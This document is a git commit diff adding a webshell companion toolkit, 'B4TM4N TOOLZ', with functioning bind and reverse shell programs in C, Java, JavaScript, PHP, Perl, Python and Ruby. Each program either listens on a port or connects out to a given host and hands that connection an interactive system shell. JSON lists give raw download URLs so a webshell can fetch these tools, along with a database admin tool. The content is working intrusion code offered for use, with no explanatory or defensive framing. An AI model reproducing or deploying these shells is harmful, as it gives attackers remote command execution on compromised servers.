Added B4TM4N TOOLZ

From: https://github.com/k4mpr3t/b4tm4n-toolz
2024-09-19 21:31:56 +00:00 · 2018-12-20 15:51:32 +08:00 · 2018-12-20 15:51:32 +08:00 · f803bba0fb
commit f803bba0fb
parent ddb43c6b88
11 changed files with 2368 additions and 0 deletions
--- a/b4tm4n-toolz/README.md
+++ b/b4tm4n-toolz/README.md
@ -0,0 +1,3 @@
+# B4TM4N TOOLZ
+
+The Tools for B4TM4N ~ PHP WEBSHELL
--- a/b4tm4n-toolz/backconnect/back.h
+++ b/b4tm4n-toolz/backconnect/back.h
@ -0,0 +1,42 @@
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <unistd.h>
+int main(int argc,char *argv[]){
+	int s,c,o=1;
+	struct sockaddr_in i;
+	if(argc==2){
+		i.sin_family=AF_INET;
+		i.sin_port=htons(atoi(argv[1]));
+		i.sin_addr.s_addr=htonl(INADDR_ANY);
+		s=socket(AF_INET,SOCK_STREAM,0);
+		setsockopt(s,SOL_SOCKET,SO_REUSEADDR,&o,sizeof(o));
+		if(!s)exit(0);
+		bind(s,(struct sockaddr *)&i,0x10);
+		listen(s,5);
+		c=accept(s,0,0);
+		send(c,"b4tm4n shell : connected\n",24,0);
+		dup2(c,0);
+		dup2(c,1);
+		dup2(c,2);
+		system("export TERM=xterm;PS1='$PWD>';export PS1;exec /bin/sh -i");
+		close(c);
+	}
+	else if(argc==3){
+		i.sin_family=AF_INET;
+		i.sin_port=htons(atoi(argv[1]));
+		i.sin_addr.s_addr=inet_addr(argv[2]);
+		bzero(argv[2],strlen(argv[2])+1+strlen(argv[1]));
+		s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
+		if((connect(s,(struct sockaddr *)&i,sizeof(struct sockaddr)))<0)exit(0);
+		send(s,"b4tm4n shell : connected\n",24,0);
+		dup2(s,0);
+		dup2(s,1);
+		dup2(s,2);
+		system("export TERM=xterm;PS1='$PWD>';export PS1;exec /bin/sh -i");
+		close(s);
+	}
+}
--- a/b4tm4n-toolz/backconnect/back.java
+++ b/b4tm4n-toolz/backconnect/back.java
@ -0,0 +1,57 @@
+import java.io.*;
+import java.net.*;
+
+public class b4tm4n_rs{
+	private static final class pt extends Thread{
+		private InputStream is;
+		private OutputStream out;
+
+		public pt(InputStream is, OutputStream out){this.is=is;this.out=out;}
+
+		@Override
+		public void run(){
+			try{
+				byte[] b = new byte[8192];
+				int c = is.read(b);
+				while(c>=0) {
+					out.write(b,0,c);
+					out.flush();
+					c = is.read(b);
+				}
+			}
+			catch(Exception e){e.printStackTrace();}
+		}
+	}
+
+	public static void main(String[] args){
+		int port;
+		String cmd = "/bin/sh";
+		if(System.getProperty("os.name").toLowerCase().indexOf("win")>=0){cmd = "cmd";}
+		String w = "b4tm4n shell : connected\n";
+		byte[] b = w.getBytes();
+		Socket h = new Socket();
+		try{
+			if(args.length==1){
+				port = Integer.parseInt(args[0]);
+				ServerSocket s = new ServerSocket(port);
+				h = s.accept();
+			}
+			else if(args.length==2){
+				port = Integer.parseInt(args[0]);
+				String ip = args[1];
+				h = new Socket(ip, port);
+			}
+			if(args.length==1 || args.length==2){
+				InputStream gis = h.getInputStream();
+				OutputStream gos = h.getOutputStream();
+				gos.write(b);
+				Process p = Runtime.getRuntime().exec(cmd);
+
+				pt p1 = new pt(p.getInputStream(), gos);
+				pt p2 = new pt(gis, p.getOutputStream());
+				p1.start();p2.start();
+			}
+		}
+		catch(Exception e){e.printStackTrace();}
+	}
+}
--- a/b4tm4n-toolz/backconnect/back.js
+++ b/b4tm4n-toolz/backconnect/back.js
@ -0,0 +1,29 @@
+var spawn = require('child_process').spawn;
+var net = require('net');
+var stream = require('stream');
+var console = require('console');
+
+var shell = '/bin/sh';
+if(process.platform.match(/^win/i)) shell = 'cmd.exe';
+
+var argv = process.argv;
+if(argv.length==3){
+	var h = net.createServer(function(s){
+		s.write("b4tm4n shell : connected\n");
+        var sh = spawn(shell);
+        sh.stdin.resume()
+        sh.stdout.on("data",function (data){s.write(data);});
+        sh.stderr.on("data",function (data){s.write(data);});
+        s.on("data",function (data){sh.stdin.write(data);});
+	});
+	h.listen(argv[2]);
+}
+else if(argv.length==4){
+	var s = net.createConnection(argv[2], argv[3]);
+	s.write("b4tm4n shell : connected\n");
+	var sh = spawn(shell);
+	sh.stdin.resume()
+	sh.stdout.on("data",function (data){s.write(data);});
+	sh.stderr.on("data",function (data){s.write(data);});
+	s.on("data",function (data){sh.stdin.write(data);});
+}
--- a/b4tm4n-toolz/backconnect/back.php
+++ b/b4tm4n-toolz/backconnect/back.php
@ -0,0 +1,128 @@
+<?php
+error_reporting(0);
+set_time_limit(0);
+ob_implicit_flush();
+
+$targets=explode(" ",$target);
+$cs=1337;
+$wa=null;
+$ea=null;
+$sh="export TERM=xterm;PS1='\$PWD>';export PS1;/bin/sh -i";
+$m="b4tm4n shell : connected\n";
+
+if(count($targets)==1){
+	$p=$target;
+	$h="";
+	$t="bind";
+}
+elseif(count($targets)==2){
+	$p=$targets[0];
+	$h=$targets[1];
+	$t="back";
+}
+
+if(function_exists('pcntl_fork')){
+	$pid=pcntl_fork();
+	if($pid==-1)exit(1);
+	if($pid)exit(0);
+	if(posix_setsid()==-1)exit(1);
+}
+
+if($t=="bind"){
+	$s=stream_socket_server("tcp://0.0.0.0:".$p,$errno,$errstr);
+	stream_set_timeout($s,30);
+	$c=stream_socket_accept($s);
+	if(strtolower(substr(php_uname(),0,3))=="win"){
+		fwrite($c,$m.getcwd().">");
+		while($p!==false){
+			$p=fgets($c);
+			if(preg_match("/cd\ ([^\s]+)/i",$p,$rr)){
+				$dd=$rr[1];
+				if(is_dir($dd))chdir($dd);
+				$o=getcwd().">";
+			}
+			elseif(trim(strtolower($p))=="exit" || trim(strtolower($p))=="quit") break;
+			else $o=exe($p)."\n".getcwd().">";
+			fwrite($c,$o);
+		}
+		fclose($c);
+		fclose($s);
+	}
+	else{
+		fwrite($c,$m);
+		$ds=array(0=>array("pipe","r"),1=>array("pipe","w"),2=>array("pipe","w"));
+		$pr=proc_open($sh,$ds,$pip);
+		if(!is_resource($pr))exit(1);
+		stream_set_blocking($pip[0],0);
+		stream_set_blocking($pip[1],0);
+		stream_set_blocking($pip[2],0);
+		stream_set_blocking($c,0);
+		while(true){
+			if(feof($c)||feof($pip[1]))break;
+			$ra=array($c,$pip[1],$pip[2]);
+			stream_select($ra,$wa,$ea,null);
+			if(in_array($c,$ra)){
+				$i=fread($c,$cs);
+				fwrite($pip[0],$i);
+			}
+			if(in_array($pip[1],$ra)){
+				$i=fread($pip[1],$cs);
+				fwrite($c,$i);
+			}
+			if(in_array($pip[2],$ra)){
+				$i=fread($pip[2],$cs);
+				fwrite($c,$i);
+			}
+		}
+		fclose($s);fclose($c);fclose($pip[0]);fclose($pip[1]);fclose($pip[2]);
+		proc_close($pr);
+	}
+}
+elseif($t=="back"){
+	$s=fsockopen($h,$p,$en,$es,30);
+	if(strtolower(substr(php_uname(),0,3))=="win"){
+		fwrite($s,$m.getcwd().">");
+		while($p!==false){
+			$p=fgets($s);
+			if(preg_match("/cd\ ([^\s]+)/i",$p,$rr)){
+				$dd=$rr[1];
+				if(is_dir($dd))chdir($dd);
+				$o=getcwd().">";
+			}
+			elseif(trim(strtolower($p))=="exit" || trim(strtolower($p))=="quit") break;
+			else $o=exe($p)."\n".getcwd().">";
+			fwrite($s,$o);
+		}
+		fclose($s);
+	}
+	else{
+		fwrite($s,$m);
+		$ds=array(0=>array("pipe","r"),1=>array("pipe","w"),2=>array("pipe","w"));
+		$pr=proc_open($sh,$ds,$pip);
+		if(!is_resource($pr))exit(1);
+		stream_set_blocking($pip[0],0);
+		stream_set_blocking($pip[1],0);
+		stream_set_blocking($pip[2],0);
+		stream_set_blocking($s,0);
+		while(true){
+			if(feof($s)||feof($pip[1]))break;
+			$ra=array($s,$pip[1],$pip[2]);
+			stream_select($ra,$wa,$ea,null);
+			if(in_array($s,$ra)){
+				$i=fread($s,$cs);
+				fwrite($pip[0],$i);
+			}
+			if(in_array($pip[1],$ra)){
+				$i=fread($pip[1],$cs);
+				fwrite($s,$i);
+			}
+			if(in_array($pip[2],$ra)){
+				$i=fread($pip[2],$cs);
+				fwrite($s,$i);
+			}
+		}
+		fclose($s);fclose($pip[0]);fclose($pip[1]);fclose($pip[2]);
+		proc_close($pr);
+	}
+}
+?>
--- a/b4tm4n-toolz/backconnect/back.pl
+++ b/b4tm4n-toolz/backconnect/back.pl
@ -0,0 +1,31 @@
+#!/usr/bin/env perl
+use IO::Socket;
+$os=$^O;
+$sh="export TERM=xterm;PS1='\$PWD\>';export PS1;/bin/sh -i";
+if($os=~m/win/i){$sh="%COMSPEC% /K";}
+$t=getprotobyname('tcp');
+socket(S,&PF_INET,&SOCK_STREAM,$t)||die();
+if(@ARGV==1){
+	$p=$ARGV[0];
+	setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
+	bind(S,sockaddr_in($p,INADDR_ANY))||die();
+	listen(S,3)||die();
+	accept(C,S);
+	send(C,"b4tm4n shell : connected\n",0);
+	open STDIN,"<&C";open STDOUT,">&C";open STDERR,">&C";
+	exec $sh||die();
+	close(C);close(S);close(STDIN);close(STDOUT);close(STDERR);
+	exit 0;
+}
+elsif(@ARGV==2){
+	$p=$ARGV[0];
+	$h=$ARGV[1];
+	$i=inet_aton($h)||die();
+	$a=sockaddr_in($p,$i)||die();
+	connect(S,$a)||die();
+	send(S,"b4tm4n shell : connected\n",0);
+	open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");
+	exec $sh||die();
+	close(S);close(STDIN);close(STDOUT);close(STDERR);
+}
+else{exit(1);}
--- a/b4tm4n-toolz/backconnect/back.py
+++ b/b4tm4n-toolz/backconnect/back.py
@ -0,0 +1,64 @@
+#!/usr/bin/env python
+import re,subprocess,os,sys,socket,time
+p=""
+h=""
+def shell(c):
+	proc=subprocess.Popen(c,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)
+	return proc.stdout.read()+proc.stderr.read()+prompt().encode('utf-8')
+
+def action(c):
+	if os.name!="nt":
+		f=c.fileno()
+		os.system("export TERM=xterm;PS1='$PWD>';export PS1;/bin/sh -i <&"+str(f)+" >&"+str(f)+" 2>&"+str(f))
+	else:
+		while True:
+			try:
+				r=c.recv(1024).decode("utf-8")
+			except:
+				pass
+			else:
+				if len(r)>0:
+					b=re.search("cd\ ([^\s]+)",r,flags=re.IGNORECASE)
+					if b:
+						if os.path.isdir(b.group(1)):
+							os.chdir(b.group(1))
+						c.send(prompt().encode('utf-8'))
+					else:
+						out=shell(r)
+						if out and len(out)>0:c.send(out)
+				else: return False
+
+def prompt():
+	return "\n"+os.getcwd()+">"
+g=sys.argv
+if len(g)==2:
+	p=g[1]
+elif len(g)==3:
+	p=g[1]
+	h=g[2]
+else:exit(1)
+p=int(p)
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
+if len(g)==2:
+	s.bind(("0.0.0.0",p))
+	s.listen(5)
+	try:(c,a)=s.accept()
+	except:
+		time.sleep(1)
+	else:
+		if os.name!="nt":
+			c.send(("b4tm4n shell : connected\n").encode('utf-8'))
+		else:
+			c.send(("b4tm4n shell : connected"+prompt()).encode('utf-8'))
+		action(c)
+if len(g)==3:
+	try: s.connect((h,p))
+	except:
+		time.sleep(5)
+	else:
+		if os.name!="nt":
+			s.send(("b4tm4n shell : connected\n").encode('utf-8'))
+		else:
+			s.send(("b4tm4n shell : connected"+prompt()).encode('utf-8'))
+		action(s)
--- a/b4tm4n-toolz/backconnect/back.rb
+++ b/b4tm4n-toolz/backconnect/back.rb
@ -0,0 +1,100 @@
+#!/usr/bin/env ruby
+require 'socket'
+require 'pathname'
+
+def sucks
+	return RUBY_PLATFORM.downcase.match('mswin|win|mingw')?true:false
+end
+
+def realpath(str)
+	r=str
+	if File.exists?(str)
+		r=Pathname.new(str).realpath.to_s
+	end
+	if sucks then r=r.gsub(/\//,"\\") end
+	return r
+end
+
+if ARGV.length==1
+    ARGV[0]=~/^[0-9]{1,5}$/?p=Integer(ARGV[0]):exit
+    s=TCPServer.new("",p)
+    c=s.accept
+    c.print "b4tm4n shell : connected\n"
+    begin
+        if not sucks
+            f=c.to_i
+            exec sprintf("export TERM=xterm;PS1='\$PWD\>';export PS1;/bin/sh -i \<\&%d \>\&%d 2\>\&%d",f,f,f)
+        else
+            c.print realpath(".")+">"
+            while l=c.gets
+                raise errorBro if l=~/^die\r?$/
+                if not l.chomp==""
+                    if l=~/cd .*/i
+                        l=l.gsub(/cd /i,'').chomp
+                        if File.directory?(l)
+                            l=realpath(l)
+                            Dir.chdir(l)
+                        end
+                        c.print realpath(".")+">"
+                    elsif l=~/\w:.*/i
+                        if File.directory?(l.chomp)
+                            Dir.chdir(l.chomp)
+                        end
+                        c.print realpath(".")+">"
+                    else
+                        IO.popen(l,"r"){|io|c.print io.read+"\n"+realpath(".")+">"}
+                    end
+                end
+            end
+        end
+    rescue errorBro
+		exit
+    ensure
+        s.close
+        s=nil
+    end
+elsif ARGV.length==2
+	if ARGV[0]=~/^[0-9]{1,5}$/
+		p=Integer(ARGV[0]);
+		h=ARGV[1]
+	else
+		exit
+	end
+	s=TCPSocket.new("#{h}",p)
+	s.print "b4tm4n shell : connected\n"
+	begin
+		if not sucks
+			f=s.to_i
+			exec sprintf("export TERM=xterm;PS1='\$PWD\>';export PS1;/bin/sh -i \<\&%d \>\&%d 2\>\&%d",f,f,f)
+		else
+			s.print realpath(".")+">"
+			while l=s.gets
+				raise errorBro if l=~/^die\r?$/i
+				if not l.chomp==""
+					if l=~/cd .*/i
+						l=l.gsub(/cd /i,'').chomp
+						if File.directory?(l)
+							l=realpath(l)
+							Dir.chdir(l)
+						end
+						s.print realpath(".")+">"
+					elsif l=~/\w:.*/i
+						if File.directory?(l.chomp)
+							Dir.chdir(l.chomp)
+						end
+						s.print realpath(".")+">"
+					else
+						IO.popen(l,"r"){|io|s.print io.read+"\n"+realpath(".")+">"}
+					end
+				end
+			end
+		end
+	rescue errorBro
+		exit
+	ensure
+		s.close
+		s=nil
+	end
+else
+    exit
+end
--- a/b4tm4n-toolz/backconnect/list.json
+++ b/b4tm4n-toolz/backconnect/list.json
@ -0,0 +1,9 @@
+{"b4tm4n_t00lz":[
+    { "name":"C Shell", "url":"https://raw.githubusercontent.com/k4mpr3t/b4tm4n-toolz/master/backconnect/back.h" },
+    { "name":"Java Shell", "url":"https://raw.githubusercontent.com/k4mpr3t/b4tm4n-toolz/master/backconnect/back.java" },
+    { "name":"Javascript Shell", "url":"https://raw.githubusercontent.com/k4mpr3t/b4tm4n-toolz/master/backconnect/back.js" },
+    { "name":"Php Shell", "url":"https://raw.githubusercontent.com/k4mpr3t/b4tm4n-toolz/master/backconnect/back.php" },
+    { "name":"Perl Shell", "url":"https://raw.githubusercontent.com/k4mpr3t/b4tm4n-toolz/master/backconnect/back.pl" },
+    { "name":"Python Shell", "url":"https://raw.githubusercontent.com/k4mpr3t/b4tm4n-toolz/master/backconnect/back.py" },
+    { "name":"Ruby Shell", "url":"https://raw.githubusercontent.com/k4mpr3t/b4tm4n-toolz/master/backconnect/back.rb" },
+]}
--- a/b4tm4n-toolz/database/adminer-4.5.0.php
+++ b/b4tm4n-toolz/database/adminer-4.5.0.php
--- a/b4tm4n-toolz/database/list.json
+++ b/b4tm4n-toolz/database/list.json
@ -0,0 +1,3 @@
+{"b4tm4n_t00lz":[
+    { "name":"Adminer 4.5.0", "url":"https://raw.githubusercontent.com/k4mpr3t/b4tm4n-toolz/master/database/adminer-4.5.0.php" },
+]}